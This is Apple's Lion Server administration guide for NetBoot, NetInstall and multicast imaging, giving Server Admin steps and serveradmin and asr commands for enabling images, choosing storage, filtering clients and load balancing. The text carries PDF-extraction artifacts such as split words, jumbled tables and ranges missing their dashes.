For older computers, such as tray-loading iMac or Power Macintosh G3 (Blue and White) computers, to use NetBoot, you must enable NetBoot 1.0. You can do so by using the dscl tool. Note: NetBoot 1.0 and 2.0 can run on the same network simultaneously.
Enter the following: $ sudo dscl . create /config/dhcp old_netboot_enabled port_list $ sudo killall bootpd
Parameter
Description List of ports you want to enable for NetBoot 1.0, formatted like
port_list
en0M
en1
en2.
NetBoot
Start NetBoot and related services

NetBoot service uses AFP, NFS, DHCP, Web, and TFTP services, depending on the types of clients youre trying to boot. (See NetBoot considerations and requirements.) You can use Server Admin to start DHCP, Web, and NetBoot services. You can use ther Server app to start AFP. NFS and TFTP services start automatically.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. If you boot diskless Mac OS X Lion clients, s tart AFP service in the Server app by s electing File Sharing and then turn it on. 4. If your s erver is providing DHCP service, make sure the DHCP service is configured and running; otherwise, DHCP service must be supplied by another server on your network. If your NetBoot server is also supplying DHCP service, you might get better performance if you configure your server as a gateway. That is, configure your s ubnets to us e the servers IP address as the router IP addres s. 5. From the expanded Servers list, select NetBoot. 6. Click Settings, then click General. 7. Select which network ports to use for providing NetBoot service. You can s elect one or more network ports to serve NetBoot images . For example, if you have a s erver with two network interfaces , each connected to a network, you can choose to serve NetBoot images on both networks . 8. Click Images . 9. Select the images to s erve. 10. Click Save. 11. Click the Start NetBoot button (below the Servers list).
NetBoot
Start NetBoot from the command line

You can us e serveradmin to start NetBoot s ervices using the command line.
To start NetBoot and supporting s ervices : $ sudo serveradmin start netboot If you get the following respons e, you have not enabled NetBoot on a network port: $ netboot:state = "STOPPED" $ netboot:status = 5000 For information about serveradmin, see its man page.
NetBoot
Enable images from the command line

You can us e serveradmin to enable images on your server, to make the images available to client computers for NetBoot startups.
To enable disk images : $ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:IsEnabled = yes
Parameter
Description
netBootImagesRecordsArray:_array_index:n:IsEna
Default = no
Sets whether the image is available to NetBoot.
Specifies the array index number of the volume you want to set as the default image.
NetBoot
Manage images
Balance NetBoot image access

If you add a second NetBoot server to a network, have your us ers res elect their NetBoot image in the Startup Dis k control pane or preferences pane. This caus es the NetBoot server load to be redis tributed between the servers. You can also force redistribution of the load by deleting the /var/db/bs dpd_clients file from the exis ting NetBoot s erver. Note: After deleting the bsdpd_clients file, the s erver does not remember which clients selected which NetBoot or NetInstall volumes via Startup Dis k. Unless the clients reselect their intended NetBoot or NetInstall volumes , the clients boot into the default image on the server. Similarly, if youre recovering from a server or infrastructure failure and your clients are starting up from a reduced number of NetBoot servers, delete the bsdpd_clients file from the running servers so clients can again start from among the entire set of servers . The bsdpd_clients file holds the Ethernet MAC addres ses of the computers that have s elected the server as their NetBoot server. As long as a client has an entry in an available servers bs dpd_clients file, it always s tarts from that server. If that s erver becomes unavailable, the clients locate and associate themselves with an available s erver until you remove their entries (or the files) from their servers. Note: If a client is registered on more than one server becaus e an unavailable s erver comes back on line, the client starts up from
the server with the fewest number of clients that started from it.
NetBoot
Manage images
Enable images
You mus t enable disk images on your s erver to make the images available to client computers for NetBoot s tartups .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Images. 5. For each image you want your clients to see, click the checkbox in the Enable column. 6. Click Save.
NetBoot
Manage images
Choose where images are stored

You can us e Server Admin to choose volumes for storing NetBoot and NetInstall images . WARNING: Dont rename a NetBoot share point or the volume it resides on. Dont use Server Admin to stop sharing for a NetBoot share point unless you first deselect the share point for images and shadow files .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click General. 5. In the list of volumes (in the lower half of the pane), click the checkbox in the Images column for each volume you want to store image files on. 6. Click Save.
NetBoot
Manage images
Choose where images are stored, from the command line

You can us e serveradmin to choos e volumes for storing NetBoot and NetIns tall images.
To specify a volume to store image files: $ sudo serveradmin settings netboot:netBootStorageRecordsArray:_array_index:n:sharepoint = value netboot:netBootStorageRecordsArray:_array_index:n:clients = value netboot:netBootStorageRecordsArray:_array_index:n:ignorePrivs = value netboot:netBootStorageRecordsArray:_array_index:n:volType = value netboot:netBootStorageRecordsArray:_array_index:n:path = value netboot:netBootStorageRecordsArray:_array_index:n:volName = value
netboot:netBootStorageRecordsArray:_array_index:n:volIcon = value netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteClients = value netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint = value ControlD
Parameter (netboot:)
Description
First parameter in an array describing a volume available to serve netBootStorageRecordsArray:_array_index:n:sharepoint images. Default =
"no"
netBootStorageRecordsArray:_array_index:n:clients Default = "no"

Default = "false" netBootStorageRecordsArray:_array_index:n:ignorePrivs
netBootStorageRecordsArray:_array_index:n:volType Default = voltype

Example:
"hfs" "/"
netBootStorageRecordsArray:_array_index:n:path
Default =
netBootStorageRecordsArray:_array_index:n:volName Default = name netBootStorageRecordsArray:_array_index:n:volIcon Default = icon

Default = "yes" netBootStorageRecordsArray:_array_index:n:okToDeleteClients Default = "yes" netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint n T he array index number of the volume you want as the default image.
NetBoot
Manage images
Choose where shadow files are stored

When a diskless client boots , shadow (temporary) files are stored on the server. You can us e Server Admin to specify which server volumes are used to store the shadow files . WARNING: Dont rename a NetBoot share point or the volume it resides on. Dont use Server Admin to stop sharing for a NetBoot share point unless you first deselect the share point for images and shadow files .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click General. 5. In the list of volumes (in the lower half of the pane), click the checkbox in the Client Data column for the volumes to store shadow files on. 6. Click Save.
NetBoot
Manage images
Use serveradmin to choose where shadow files are stored
You can us e serveradmin to specify which s erver volumes are used to store shadow files.
To specify a volume to store shadow files : $ sudo serveradmin settings netboot:netBootStorageRecordsArray:_array_index:n:sharepoint = value netboot:netBootStorageRecordsArray:_array_index:n:clients = yes netboot:netBootStorageRecordsArray:_array_index:n:ignorePrivs = value netboot:netBootStorageRecordsArray:_array_index:n:volType = value netboot:netBootStorageRecordsArray:_array_index:n:path = value netboot:netBootStorageRecordsArray:_array_index:n:volName = value netboot:netBootStorageRecordsArray:_array_index:n:volIcon = value netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteClients = value netboot:netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint = value ControlD
Description
First parameter in an array describing a volume available to serve netBootStorageRecordsArray:_array_index:n:sharepoint images. Default =
"no"
netBootStorageRecordsArray:_array_index:n:clients Default = "no"

Default = "false" netBootStorageRecordsArray:_array_index:n:ignorePrivs
netBootStorageRecordsArray:_array_index:n:volType Default = voltype

Example:
"hfs" "/"
netBootStorageRecordsArray:_array_index:n:path
Default =
netBootStorageRecordsArray:_array_index:n:volName Default = name netBootStorageRecordsArray:_array_index:n:volIcon Default = icon

Default = "yes" netBootStorageRecordsArray:_array_index:n:okToDeleteClients Default = "yes" netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint n T he array index number of the volume you want to set as the default image.
NetBoot
Manage images
Use images stored on remote servers

You can store NetBoot or NetInstall images on separate remote servers other than the NetBoot server. You mus t copy the images from the NetBoot server to the remote server and then configure the remote server to use the images.
1. Copy the image.nbi folder from the NetBoot server to the remote s erver on a NetBoot sharepoint (/Library/NetBoot/NetBootSPn ). If the image is on the remote server, you can create the .nbi folder on the NetBoot server by duplicating an existing .nbi folder and adjusting the values in its NBImageInfo.plist file.
2. Open Server Admin and connect to the remote server. 3. Click the triangle at the left of the server. The list of s ervices appears . 4. From the expanded Servers list, select NetBoot. 5. Click Settings, then click Images. 6. For each image you want your clients to see from the remote server, click the checkbox in the Enable column. 7. Select the protocol you want NetBoot to us e when s erving your image (NFS or HTTP). 8. Click Save.
NetBoot
Manage images
Specify the default image

The default image is the image us ed when you s tart up a client computer while holding down the N key, providing that the client has nt selected a NetBoot or NetInstall volume via Startup Dis k. See Start up us ing the N key. If you created more than one startup dis k image, you can us e NetBoot service s ettings in Server Admin to s elect the default startup image. Important: If you have dis kless clients , set their boot image as the default image. If you have more than one NetBoot s erver on the network, a client uses the default image from the firs t server that responds. There is no way to control which default image is us ed when more than one is available.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Images. 5. In the Default column, click the checkbox next to the image. You can s elect separate default images for Intel-based and PowerPC-based Macintosh computers. The architecture column shows the image type. Mac OS X Lion images can boot Intel-based Macintosh computers only. 6. Click Save.
NetBoot
Manage images
Use serveradmin to specify the default image

You can us e serveradmin to set the default image us ed when you start up a client computer while holding down the N key.
To specify the default image: $ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:IsDefault = yes
Description
netBootImagesRecordsArray:_array_index:n:IsDefault yes
Specifies this image file as the default boot image on the subnet. n Specifies the array index number of the volume you want to set as the default image.
NetBoot
Manage images
Set an image for diskless booting

You can us e Server Admin to make an image available for booting client computers that have no local disk drives. Setting an image for diskless booting instructs the NetBoot server to allocate space for the clients shadow files.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Images. 5. In the Dis kless column, click the box next to the image in the list. 6. Click Save. Important: If you have dis kless clients , set their NetBoot image as the default image. For help specifying where the clients shadow files are s tored, see Choose where shadow files are s tored.
NetBoot
Manage images
Use serveradmin to set an image for diskless booting

You can us e serveradmin to make an image available for booting client computers that have no local disk drives .
To set an image for a dis kless boot: $ sudo serveradmin settings netboot:netBootImagesRecordsArray:_array_index:n:SupportsDiskless = yes
Parameter (netboot:) netBootImagesRecordsArray:_array_index:n :SupportsDiskless Description
yes
Directs the NetBoot server to allocate space for shadow files needed by diskless clients.
Specifies the array index number of the volume you want to set as the default image.
NetBoot
Manage images
Restrict NetBoot clients by filtering addresses

The filtering feature of NetBoot service lets you restrict access to the service based on the clients Ethernet hardware (MAC) address. A clients hardware addres s is added to the filter list the firs t time it s tarts from an image on the server and is permitted access by default, s o it is usually not neces sary to enter hardware addresses manually.
1. Open Server Admin and connect to the s erver 2. Click the triangle at the left of the server. The list of s ervices appears .
3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Filters . 5. Select Enable NetBoot/DHCP filtering. 6. Select Allow only clients lis ted below (deny others) or Deny only clients listed below (allow others). 7. Use the Add button (+) and Delete button () to set up the lis t of client addres ses, and click OK. To look up a MAC address, enter the clients DNS name or IP address in the Host Name field and click Find. To find the hardware address for a computer using Mac OS X Lion, look on the TCP/IP pane of the computers Network preference or run Apple Sys tem Profiler. 8. Click Save. Note: You can also restrict acces s to a NetBoot image by selecting the name of the image in the Images pane of NetBoot service settings in Server Admin, clicking the Edit (/) button, and providing the required information.
NetBoot
Manage images
Use serveradmin to restrict NetBoot clients by filtering addresses

You can us e serveradmin to restrict NetBoot clients.
To enable disk images : $ sudo serveradmin settings netboot:netBootFiltersRecordsArray:_array_index:n:hostName = value netboot:netBootFiltersRecordsArray:_array_index:n:filterType = value netboot:netBootFiltersRecordsArray:_array_index:n:hardwareAddress = value ControlD
Parameter (netboot:) netBootFiltersRecordsArray:_array_index:n :hostName netBootFiltersRecordsArray:_array_index:n :filterType
Description T he host name of the filtered computer, if available. Whether the specified computer is allowed or denied access. Options:
"allow" "deny"
netBootFiltersRecordsArray:_array_index:n :hardwareAddress n T he Ethernet hardware (MAC) address of the filtered computer. T he array index number of the volume you want to set as the default image.
NetBoot
Manage images
Set up NetBoot service across subnets

A network boot s tarts when the client computer broadcasts for computers that will respond to Boot Service Discovery Protocol (BSDP). By default, routers are usually configured to block broadcast traffic to reduce the amount of unnecessary data flowing to other parts of the network. To provide NetBoot service across s ubnets , you must configure the router to pass on BSDP traffic to the NetBoot s erver. To see if your router is capable of passing BSDP traffic, check with your router manufacturer. Sometimes this is also referred to as using a DHCP helper or a DHCP relay agent.
NetBoot
Set up NetBoot clients
Set up diskless clients

NetBoot service enables you to configure client computers without locally installed operating s ystems or even without ins talled disk drives . Systemless or diskles s clients can s tart from a NetBoot server us ing the N key method. (See Start up using the N key.) After the client computer starts, you can use Startup Disk preferences to select the NetBoot disk image as the startup disk for the client. That way you no longer need to use the N key method to start the client from the server. Removing the sys tem s oftware from client computers gives you more control over user environments . By forcing the client to start up from the server and using client management to deny acces s to the client computer local hard disk, you can prevent users from saving files to the local hard disk. Client computer requirements Client computers must have an Ethernet connection to the network that the NetBoot s erver is on and us e DHCP to obtain an IP address.
NetBoot
Select a NetBoot boot image

On a client computer us e Startup Disk preferences to select a NetBoot boot image.
1. In Sys tem Preferences, select Startup Disk. 2. Select the network volume to start the computer with. 3. Click Res tart. The NetBoot icon appears and the computer starts from the selected image.
NetBoot
Image multiple clients using the multicast asr command

You can enable a multicast image s erver using the Mac server Multicast asr command. Multicast asr can restore multiple clients simultaneously from one looping multicast of an asr dis k image. An asr disk image is the same as a NetRestore image that you create us ing System Image Utility. Each client can receive the NetRestore image at any time during a multicast of the image, and the client continues receiving the first part of the next multicast until the client receives the complete NetRestore image. The s erver multicas ts only one copy of the NetRestore image at a time, and all clients receive this copy. If the server finis hes multicasting the NetRes tore image and a client is s till requesting the image, the s erver multicasts the image again. Thus, using multicast asr to stream images to multiple clients doesnt congest the network nearly as much as Network Install with multiple clients. To enable the image server, use the asr tool with the -server flag and a correctly built image and plist file.
To s tart a multicas t server for a specified image: $ asr -source compressed image -server configuration.plist The image does not s tart multicasting on the network until a client attempts to start a restore. The server continues to multicast the image until the process is terminated. To configure a client to receive a multicast s tream: $ sudo asr -source asr://hostname -target targetvol -erase The client receives the multicast stream from hostname and s aves it to the client.
To overwrite an existing image, add -erase. Using -erase with -target indicates an image should be overwritten when doing a multicas t.
For information about asr, see its man page.
NetBoot
Select a NetInstall image

On a client computer us e Startup Disk preferences to select a NetIns tall image.
1. In Sys tem Preferences, select Startup Disk. 2. Select the network volume to start the computer with. 3. Click Res tart. The NetBoot icon appears, the computer starts from the selected image, and the installer runs .
NetBoot
Start up using the N key

You can us e this method to s tart up any supported client computer from a NetBoot disk image. When you s tart up with the N key, the client computer starts up from the default NetBoot disk image. If multiple s ervers are present, the client s tarts up from the default image of the firs t server to respond. Note: For more information about us ing the N key when starting the system, s ee the manual that was provided with the computer. Some computers have extra capabilities. If an older client computer requires BootP for IP address ing (such as a tray-loading iMac, blue and white PowerMac G3, or older computer), use this method for s tarting up from a NetBoot dis k image. Older computers dont support selecting a NetBoot startup disk image from the Startup Disk control pane or preferences pane. The N key also provides a way to s tart up client computers that dont have system s oftware ins talled. See Set up dis kless clients.
1. Start up (or res tart) the client computer and hold down the N key immediately after you hear the s tartup tone (while the screen is still black). You can releas e the N key when the NetBoot icon appears in the center of the screen. 2. If a login window appears , enter your name and password. The network disk image has an icon typical of s erver volumes.
NetBoot
Change how NetBoot clients allocate shadow files

By default, a Mac OS X Lion NetBoot client places its shadow files in a NetBootClients n s hare point on the server, where n is the share point number. If no s uch s hare point is available, the client tries to s tore its shadow files on a local hard disk. For Mac OS X v10.3 and later images set for diskless booting, you can change this behavior by us ing a text editor to specify a value for the NETBOOT_SHADOW variable in the image /etc/hostconfig file. Note: This value is set in the /etc/hostconfig file in the image .dmg file, not in the s erver hostconfig file. These values are permitted:
Value of NETBOOT_SHADOW -NETWORKClient shadow file behav ior (Default) Try to use a server NetBootClientsn share point for storing shadow files. If no server share point is available, use a local drive.
-NETWORK_ONLY-
T ry to use a server NetBootClientsn share point for storing shadow files. If no server share point is available, dont boot.
-LOCAL-
T ry to use a local drive for storing shadow files. If no local drive is available, use a server NetBootClientsn share point.
-LOCAL_ONLY-
T ry to use a local drive for storing shadow files. If no local drive is available, dont boot.
NetBoot
Manage NetBoot serv ice
Tools for managing NetBoot service

The Server Admin and System Image Utility applications provide a graphical interface for managing NetBoot service in Lion Server. In addition, you can manage NetBoot service from the command line by using Terminal. These applications are included with Lion Server and can be installed on another computer with Mac OS X Lion, making that computer an administrator computer. For more information about setting up an administrator computer, see the s erver administration chapter of Getting Started. Server Admin Server Admin provides acces s to tools you use to set up, manage, and monitor NetBoot service and other services. You use Server Admin to: Set up Lion Server as a DHCP server and configure NetBoot service to use NetBoot and NetInstall images . For instructions, see NetBoot s etup overview. Manage and monitor NetBoot service. For more information about using Server Admin, see Server Admin help or Advanced Server Administration. This guide includes information about: Opening and authenticating in Server Admin Working with s pecific servers Administering services Using SSL for remote s erver administration Customizing the Server Admin environment Server Admin is installed in /Applications/Server/. Server app The Server app provides management of clients of Lion Server. For information about us ing the Server app, see Server app Help. This includes: Creating users and group Administering accounts Server app is installed in /Applications /. Workgroup Manager The Workgroup Manager application provides comprehensive management of clients of Lion Server. For information about using Workgroup Manager, see Workgroup Manager Help. This includes: Opening and authenticating in Workgroup Manager Administering accounts Customizing the Workgroup Manager environment Workgroup Manager is installed in /Applications/Server/. System Image Utility Sys tem Image Utility is a tool to create and customize NetBoot, NetInstall, and NetRestore images. With System Image Utility, you can:
Create NetBoot images that can be booted to the Finder. Create NetInstall images from a DVD or existing Mac OS X Lion partition. Create NetRestore images from an existing volume. Ass emble a workflow that creates cus tomized NetBoot and NetInstall images . For instructions on us ing Sys tem Image Utility, see System Image Utility help. Sys tem Image Utility is installed in /Applications/Server/. Command-line tools A full range of command-line tools is available for administrators who prefer to us e command-driven server administration. For remote s erver management, submit commands in a secure shell (SSH) s ession. You can enter commands on a Mac computer using the Terminal application, located in the /Applications/Utilities/ folder.
NetBoot
Turn off NetBoot service

The best way to prevent clients from using NetBoot on the server is to disable NetBoot service on all Ethernet ports.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click the Stop NetBoot button (below the Servers list) and perform one of the following tasks: To s top s ervice on a s pecific Ethernet port, click Settings , click General, and des elect the Enable checkbox for the port. To s top s erving a specific image, click Settings, click Images, and deselect the Enable checkbox for the image. To s top s ervice to a client, click Settings, click Filters, s elect Enable NetBoot Filtering, choose Deny only clients listed below, and add the clients hardware address to the list.
NetBoot
Use serveradmin to turn off NetBoot service

You can us e serveradmin to turn off NetBoot service.
To stop NetBoot s ervice or dis able images : $ sudo serveradmin stop netboot For information about serveradmin, see its man page.
NetBoot
Disable a boot or installation image

Disabling an image prevents client computers from starting using the image.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images. 5. In the Enable column, deselect the checkbox for the image. 6. Click Save.
NetBoot
Use serveradmin to disable boot or installation images

You can us e serveradmin to disable an image, preventing client computers from starting using the image.
To stop NetBoot s ervice or dis able images : $ sudo serveradmin stop netboot For information about serveradmin, see its man page.
NetBoot
View a list of NetBoot clients

You can us e Server Admin to s ee a lis t of clients that have booted from the s erver.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Clients. 5. To update the lis t, click the Refresh button (below the Servers list). Note: This is a cumulative lis ta list of all clients that have connectednot a lis t of connected clients. The last boot time is shown for each client.
NetBoot
View a list of NetBoot connections

You can us e Server Admin to s ee a lis t of clients that are booted from the server. NetInstall clients dis play install progress information.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Connections. 5. To update the lis t, click the Refresh button (below the Servers list).
NetBoot
Check the status of NetBoot and related services
You can us e Server Admin to check the status of NetBoot service and the services (such as NFS and HTTP) it uses.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Overview to s ee if the service is running, when the last client update occurred, and which related s ervices are running for an image type. 5. To review the event log, click Log. 6. To s ee a list of NetBoot clients that have booted from the s erver, click Clients . 7. To s ee a list of connected users, click Connections . The list includes the client computer name, IP address , the percentage complete, and the status .
NetBoot
Use serveradmin to check the status of NetBoot and related services

You can us e serveradmin to check the s tatus of NetBoot s ervice and the services (s uch as NFS and HTTP) it uses .
To s ee if the service is running: $ sudo serveradmin status netboot To s ee the complete s ervice status : $ sudo serveradmin fullstatus netboot
NetBoot
View the NetBoot service log

You can us e Server Admin to view a log containing diagnostic information.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Log, then use the Filter field to search for specific entries .
NetBoot
Use serveradmin to view the NetBoot service log

You can us e serveradmin to view a log containing diagnostic information.
To view the lates t entries in a log: $ tail log-file To s ee where service logs are located:
$ sudo serveradmin command netboot:command = getLogPaths
For information about tail and serveradmin, s ee its man page.
NetBoot
Performance and load balancing

For good s tartup performance, the NetBoot server must be available to the client computer relying on it. To provide res ponsive and reliable NetBoot s ervice, set up multiple NetBoot servers in your network. Many sites using NetBoot s ervice achieve acceptable responsivenes s by staggering the boot times of client computers to reduce network load. Generally, it isnt necessary to boot client computers at the s ame time; rather, client computers are booted early in the morning and remain booted throughout the work day. You can program staggered startup times us ing the Energy Saver preferences pane. Load balancing NetBoot images If heavy usage and simultaneous client startups are overloading a NetBoot server and causing delays, consider load balancing by adding extra NetBoot servers to distribute the demands of the client computers acros s multiple servers . When incorporating multiple NetBoot servers , us e switches in your network infras tructure. The s hared nature of hubs creates a single shared network on which extra servers mus t vie for time.
NetBoot
Distribute NetBoot images across servers

If you set up more than one NetBoot server on your network, you can place copies of a specific NetBoot image on multiple servers to dis tribute the load. By as signing the copies the same image index ID in the range 409665535, you can advertise them to your clients as a single image to avoid confusion. Note: You must customize the image by creating a workflow with the Create Image action to ass ign the image an index ID.
1. Locate the image file on the s erver where the original image is stored. 2. If the image index ID is 4095 or lower, recreate the image and modify the index ID using the Create Image action in a workflow, then ass ign the image an index ID in the range 409665535. For more information, see System Image Utility Help The image ID can be changed from Server Admin by double-clicking the Image ID field and entering the new ID. 3. Create copies or move image files to other servers. 4. On each server, us e Server Admin to enable the image for NetBoot service. Clients still s ee the image listed only once in Startup Dis k preferences, but the server that delivers its copy of the image is selected bas ed on s erver activity. Smaller improvements can be achieved by distributing NetBoot images across multiple disk drives on a single s erver.
NetBoot
Distribute NetBoot images across server disk drives

Even with a single NetBoot server, you might improve performance by distributing copies of an image across multiple dis k drives on the server. By assigning the copies the same image index ID in the range 409665535, you can advertise them to your clients as a single image. Important: Dont dis tribute images across different partitions of the s ame physical disk drive. Doing so does not improve, and can even reduce, performance.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click General. 5. In the Images column, s elect the checkbox for each volume to store images on. Choose volumes on different physical disk drives . 6. Click Save, then click Images. 7. If the images index is 4095 or lower, double-click the ID, enter an index in the range 409665535, and save the change. 8. Open Terminal and use the scp secure copy tool to copy the image to the NetBootSPn share points on the other volumes. For example: $ scp /Library/NetBoot/NetBootSP0/image.nbi [admin_name]@[ip_address]:/Volumes/Drive2/Library/Ne where [admin_name] is an admin login and [ip_address] is the correct IP address for that server. You are prompted for the password of the admin login.
NetBoot
Distribute shadow files

Clients s tarting up from Mac OS X Lion diskless images s tore shadow files on the server. By default, NetBoot for Mac clients creates a share point for client shadow files on the s erver boot volume. (You can change this behavior. See Choose where s hadow files are stored.) You can us e Server Admin to s ee this share point and to add others. The share points are named NetBootClients n, where n is the share point number. Share points are numbered starting with zero. For example, if your server has two dis k volumes, the default s hadow-file folder is NetBootClients0 on the boot volume. If you use Server Admin to s pecify that client data will also be stored on the s econd volume, the folder is named NetBootClients1. NetBoot stores the first clients s hadow files on NetBootClients0, the s econd clients shadow files on NetBootClients1, the third clients s hadow files on NetBootClients2, and so on. Likewise, with three volumes and eight clients, the firs t, fourth, and seventh clients use the firs t volume; the s econd, fifth, and eighth clients us e the second volume; and the third and sixth clients use the third volume. This load balancing is automatic and usually provides optimal performance. To prevent shadow files from being placed on a specific volume, use the NetBoot Service General s ettings in Server Admin. Deselect the client data checkbox for any volume you dont want s hadow files placed in. You can also prevent shadow files from being placed on a specific volume or partition by deleting the hidden file /Library/NetBoot/.clients , which is a symbolic link, and then stopping and restarting NetBoot service.
NetBoot
NetBoot service settings

General Netboot settings To configure general NetBoot service setting from Terminal, use the following parameters with the serveradmin tool.
Parameter (netboot:) Description A parameter that specifies whether client filtering is enabled. Default =
filterEnabled
"no"
An array of values for each server volume used to store boot or
netBootStorageRecordsArray... netBootFiltersRecordsArray...
installation images. For a description, see T he storage record array. An array of values for each computer explicitly allowed or disallowed access to images. For a description, see T he filters record array.
netBootImagesRecordsArray...
An array of values for each boot or installation image stored on the server. For a description, see The image record array.
netBootPortsRecordsArray...
An array of values for each server network port used to deliver boot or installation images. For a description, see T he port record array.
The storage record array An array of the following values appears in NetBoot service settings for each volume on the server used to store boot or installation images.
Parameter (netboot:) Description T he first parameter in an array describing a volume available to serve images. Default =
netBootStorageRecordsArray:_array_ index:n:sharepoint
"no" "no"
netBootStorageRecordsArray:_array_ index:n:clients netBootStorageRecordsArray:_array_ index:n:ignorePrivs netBootStorageRecordsArray:_array_ index:n:volType
Default =
Default =
"false"
Default =
"voltype"
Example: "hfs" Default =
netBootStorageRecordsArray:_array_ index:n:path netBootStorageRecordsArray:_array_ index:n:volName netBootStorageRecordsArray:_array_ index:n:volIcon netBootStorageRecordsArray:_array_ index:n:okToDeleteClients netBootStorageRecordsArray:_array_ index:n:okToDeleteSharepoint
"/" "name"
Default =
Default =
"icon"
Default =
"yes"
Default =
"yes"
The filters record array An array of the following values appears in NetBoot service settings for each computer explicitly allowed or denied access to images stored on the server.
Parameter (netboot:) Description T he host name of the filtered computer, if available.
netBootFiltersRecordsArray:_array_ index:n:hostName netBootFiltersRecordsArray:_array_ index:n:filterType
Whether the specified computer is allowed or denied access. Options:
"allow" "deny" netBootFiltersRecordsArray:_array_ index:n:hardwareAddress

T he Ethernet hardware (MAC) address of the filtered computer.
The image record array An array of the following values appears in NetBoot service settings for each image s tored on the server.
Parameter (netboot:) Description T he name of the image as it appears in the Startup Disk control panel (Mac OS 9) or Preferences pane (Mac OS X).
netBootImagesRecordsArray:_array_ index:n:Name
netBootImagesRecordsArray:_array_ index:n:IsDefault netBootImagesRecordsArray:_array_ index:n:RootPath netBootImagesRecordsArray:_array_ index:n:isEdited netBootImagesRecordsArray:_array_ index:n:BootFile netBootImagesRecordsArray:_array_ index:n:Description netBootImagesRecordsArray:_array_ index:n:SupportsDiskless
yes
Specifies this image file as the default boot image on the subnet. T he path to the .dmg file.
Whether the image is edited.
Name of the boot ROM file:
booter.
Arbitrary text describing the image.
yes
Directs the NetBoot server to allocate space for shadow files needed by diskless clients.
netBootImagesRecordsArray:_array_ index:n:Type netBootImagesRecordsArray:_array_ index:n:pathToImage netBootImagesRecordsArray:_array_ index:n:Index
NFSM or HTTP
T he path to the parameter list file in the .nbi folder on the server describing the image.
14095
Indicates a local image unique to the server.
409665535 is a duplicate, identical image stored on multiple servers

for load balancing.
netBootImagesRecordsArray:_array_ index:n:IsEnabled netBootImagesRecordsArray:_array_ index:n:IsInstall
Sets whether the image is available to NetBoot (or Network Image) clients.
yes
Specifies a network installation image.
no
Specifies a NetBoot image.
The port record array An array of the following items is included in the NetBoot s ervice settings for each network port on the s erver set to deliver images.
Parameter (netboot:) Description T he first parameter in an array describing a network interface available for responding to netboot requests. Default =
netBootPortsRecordsArray:_array_ index:m:isEnabledAtIndex
"no" "devname" "Built-in Ethernet" "dev"
netBootPortsRecordsArray:_array_ index:m:nameAtIndex
Default = Example:
netBootPortsRecordsArray:_array_
Default =
index:m:deviceAtIndex
Example:
"en0"
NetBoot
Solv e NetBoot problems
NetBoot troubleshooting tips

Make s ure a DHCP service is available on your network. It can be provided by DHCP on a Mac server or another server. Make s ure required services are s tarted on the s erver. See NetBoot considerations and requirements. Open Server Admin and verify the following: If youre booting Mac OS X Lion diskless clients, AFP is started If youre us ing HTTP instead of NFS to deliver images, Web s ervice is started
NetBoot
If NetBoot clients computers don't start

If your NetBoot client computers do not start: Sometimes a computer might not start immediately becaus e other computers are putting a heavy demand on the network. Wait a few minutes and try starting again. Make s ure cables are properly connected and that the computer and server are getting power. If you installed memory or an expansion card in the client computer, make s ure it is ins talled properly. If the computer has a local hard disk with a Sys tem Folder on it, dis connect the Ethernet cable and try to start the computer from the local hard disk, then reconnect the Ethernet cable and try to start the computer from the network. Boot the client computer from a local disk and verify that it is getting an IP address from DHCP. On a diskles s or s ystemless client, start from a system CD and us e Startup Disk preferences to select a boot image.
NetBoot
If you want to change the image name

You cant edit the name of an image with System Image Utility after you create it. However, there are other ways to change the name, shown below. Change the name of an uncompressed image
1. Mount the image in Finder by opening the .nbi folder containing the image and double-clicking it. 2. Open Terminal and enter the following command to rename the image: $ sudo diskutil rename /Volumes/imagenew_name Replace image with the name of the image to rename and new_name with the new name of the image. 3. When prompted, enter your administrator pas sword. The name of the image changes. 4. Unmount the image. 5. Remount the image to verify that it is renamed. Change the name of a compressed image
1. Mount the image in Finder by opening the .nbi folder containing the image and double-clicking it. 2. Open Dis k Utility.
